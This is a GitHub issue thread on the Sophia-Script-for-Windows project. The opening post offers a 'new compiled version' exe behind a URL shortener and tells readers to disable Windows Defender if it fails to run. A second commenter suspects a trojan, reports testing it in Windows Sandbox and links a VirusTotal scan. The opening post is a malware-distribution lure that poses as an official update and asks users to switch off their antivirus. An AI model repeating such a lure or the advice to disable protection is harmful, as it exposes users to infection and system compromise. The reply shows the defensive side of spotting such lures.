### ISSUE TITLE
New compiled version

### ISSUE THREAD

**Issue by datnidevs** [farag2/Sophia-Script-for-Windows#521]
### Prerequisites

- [X] Verify that this is not a Windows issue;
- [X] Refer to the [system requirements](https://github.com/farag2/Sophia-Script-for-Windows#system-requirements);
- [X] Refer to the [How to use](https://github.com/farag2/Sophia-Script-for-Windows#how-to-use);
- [X] I do not use a homebrew Windows image;
- [X] I did not tweak Windows before that could cause system instability;
- [ ] If your issue concerns the Wrapper, please mention @BenchTweakGaming in issue

### Steps to reproduce

I uploaded a new exe version here: (Try disabling Windows Defender if it does not work)
shorturl.at/jlmI5

### Windows Version

11

### Sophia Script version

6

**Comment by TheBossMagnus** [comment]
Well i suspect this is a trojan, I run it in windows sandbox (i already had some suspects) and didn't work.
VirusTotal: https://www.virustotal.com/gui/file/7c1346a74608e89bddedb04db0c24e5fe550d964ca5be007aab886ddf9467327 1
<img width="852" alt="image" src="https://github.com/farag2/Sophia-Script-for-Windows/assets/92474350/da52f81c-87c9-426c-8057-0bbc9c749321">
